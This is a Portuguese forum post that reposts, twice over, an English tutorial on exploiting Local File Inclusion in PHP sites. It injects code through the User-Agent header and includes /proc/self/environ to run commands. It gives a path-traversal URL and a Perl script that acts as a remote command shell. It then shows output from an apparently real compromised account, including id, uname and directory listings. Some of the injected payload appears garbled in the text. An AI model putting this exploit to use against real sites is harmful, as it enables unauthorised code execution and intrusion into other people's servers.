Tweet
Navegando em busca de conhecimento, depareime com o seguinte tutorial "Tecnica LFI".
Achei que poderia interessa alguem, tentei traduzi mas não ficou legal ai resolvi posta o original.
When a request to a php page is made, apache forks (creating a new proccess) and exec' the php binary to actually run/interpret the php script. As in every *nix system each process that runs, has it's own /proc entry, it can be quite useful to us, since it holds a lot information about the process and the enviroment where it is running.
More specifically, the file /proc/self/environ of a php process running has something like this:
That "Gentoo" is actually part of the userAgent of my browser. So guess what...
imagine that we change the userAgent of the browser to and make a request like:
you guessed right. it works Smile the php system is actually executed Smile
So, after coding this little perl script
I tried something like this...
jcfs@heaven ~/boxes $ perl lfi.pl Apenas usuários registrados e ativados podem ver os links., Clique aqui para se cadastrar...
jcfsprompt: id
uid=32004(fastfr00) gid=32005(fastfr00) groups=32005(fastfr00) context=system_u:system_r:initrc_t
jcfsprompt: uname -r
2.6.15-1.2054_FC5
jcfsprompt: pwd
/home/fastfr00/public_html
jcfsprompt: ls -l
total 2280
-rw-r--r-- 1 fastfr00 fastfr00 17116 Oct 24 2006 401.shtml
-rw-r--r-- 1 fastfr00 fastfr00 16941 Oct 24 2006 403.shtml
-rw-r--r-- 1 fastfr00 fastfr00 17327 Oct 24 2006 404.shtml
-rw-r--r-- 1 fastfr00 fastfr00 17026 Mar 21 17:30 500.shtml
drwxr-xr-x 2 fastfr00 fastfr00 4096 Aug 24 2006 _private
drwxr-xr-x 4 fastfr00 fastfr00 4096 Aug 24 2006 _vti_bin
(...)
Espero que tenha servido para alguem .
Achei que poderia interessa alguem, tentei traduzi mas não ficou legal ai resolvi posta o original.
Tecnica LFI
When a request to a php page is made, apache forks (creating a new proccess) and exec' the php binary to actually run/interpret the php script. As in every *nix system each process that runs, has it's own /proc entry, it can be quite useful to us, since it holds a lot information about the process and the enviroment where it is running.
More specifically, the file /proc/self/environ of a php process running has something like this:
Código:
PATH=/sbin:/usr/sbin:/bin:/usr/bin:/usr/X11R6/bin:/usr/bin:/bin� SERVER_ADMIN=webmaster@this.domain� (...) (X11; U; Linux i686; en-US; rv:1.8.1.4) Gecko/20061201 Firefox/2.0.0.4 Gentoo�HTTP_KEEP_ALIVE=300� (...)
That "Gentoo" is actually part of the userAgent of my browser. So guess what...
imagine that we change the userAgent of the browser to and make a request like:
Código:
http://somesite.com/index.php?file=../../../../../proc/self/environ
you guessed right. it works Smile the php system is actually executed Smile
So, after coding this little perl script
Código:
#!/usr/bin/perl -w
use strict;
use LWP 5.64;
use LWP::UserAgent;
my $browser = LWP::UserAgent->new;
my $url = $ARGV[0];
my ($line,$response);
$url .= "../../../../../../../../../../../../../../../../../../../../../../../../proc/self/environ";
print "jcfsprompt: ";
while( $line = ) {
chop($line);
$browser->agent("jcfs /dev/stdout");?>jcfs");
$response = $browser->get( $url );
if ($response->content =~ /jcfs(.*)jcfs/s) {
print $1;
}
print "jcfsprompt: ";
}
I tried something like this...
jcfs@heaven ~/boxes $ perl lfi.pl Apenas usuários registrados e ativados podem ver os links., Clique aqui para se cadastrar...
jcfsprompt: id
uid=32004(fastfr00) gid=32005(fastfr00) groups=32005(fastfr00) context=system_u:system_r:initrc_t
jcfsprompt: uname -r
2.6.15-1.2054_FC5
jcfsprompt: pwd
/home/fastfr00/public_html
jcfsprompt: ls -l
total 2280
-rw-r--r-- 1 fastfr00 fastfr00 17116 Oct 24 2006 401.shtml
-rw-r--r-- 1 fastfr00 fastfr00 16941 Oct 24 2006 403.shtml
-rw-r--r-- 1 fastfr00 fastfr00 17327 Oct 24 2006 404.shtml
-rw-r--r-- 1 fastfr00 fastfr00 17026 Mar 21 17:30 500.shtml
drwxr-xr-x 2 fastfr00 fastfr00 4096 Aug 24 2006 _private
drwxr-xr-x 4 fastfr00 fastfr00 4096 Aug 24 2006 _vti_bin
(...)
Espero que tenha servido para alguem .